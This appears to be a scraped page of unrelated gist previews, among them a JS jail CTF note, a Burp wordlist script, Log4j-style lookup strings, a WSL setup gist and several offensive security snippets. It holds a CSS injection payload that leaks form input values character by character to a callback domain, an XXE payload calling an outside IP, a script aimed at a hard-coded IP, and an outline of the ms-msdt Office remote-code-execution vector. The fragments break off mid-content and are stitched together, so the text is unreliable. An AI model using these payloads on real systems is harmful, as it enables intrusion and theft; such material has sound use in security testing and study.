Simple JS Jail challenge.
It is run on context, so we have nothing but to play with constructor
and console
.
1337 === eval(our_input)
input[name$=code_1][value^=a]{background-image: url(https://callback.yourdomain.com/callback?token=a&id=CODE_1);} | |
input[name$=code_1][value^=b]{background-image: url(https://callback.yourdomain.com/callback?token=b&id=CODE_1);} | |
input[name$=code_1][value^=c]{background-image: url(https://callback.yourdomain.com/callback?token=c&id=CODE_1);} | |
input[name$=code_1][value^=d]{background-image: url(https://callback.yourdomain.com/callback?token=d&id=CODE_1);} | |
input[name$=code_1][value^=e]{background-image: url(https://callback.yourdomain.com/callback?token=e&id=CODE_1);} | |
input[name$=code_1][value^=f]{background-image: url(https://callback.yourdomain.com/callback?token=f&id=CODE_1);} | |
input[name$=code_1][value^=g]{background-image: url(https://callback.yourdomain.com/callback?token=g&id=CODE_1);} | |
input[name$=code_1][value^=h]{background-image: url(https://callback.yourdomain.com/callback?token=h&id=CODE_1);} | |
input[name$=code_1][value^=i]{background-image: url(https://callback.yourdomain.com/callback?token=i&id=CODE_1); |
import requests | |
import re | |
url = "http://88.198.233.174:33534/index.php" | |
payload = { | |
"username":"", | |
"password":"x", | |
} | |
def check(data): |
import xml.etree.ElementTree as ET | |
import urllib | |
import base64 | |
import math | |
import sys | |
import re | |
# usage: Open Burp, navigate to proxy history, ctrl-a to select all records, right click and "Save Items" as an .xml file. | |
# python burplist.py burprequests.xml | |
# output is saved to wordlist.txt |
${ctx:loginId} | |
${map:type} | |
${filename} | |
${date:MM-dd-yyyy} | |
${docker:containerId} | |
${docker:containerName} | |
${docker:imageName} | |
${env:USER} | |
${event:Marker} | |
${mdc:UserId} |
MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).
The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).
Here are the steps to build a Proof-of-Concept docx:
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
References:
Windows Subsystem 2 for Linux, Hyper, ZSH + Oh My Zsh + Powerlevel9k + plugins, FNM + VSCode (+ext) and Nerd Font
To setup native Linux, see this gist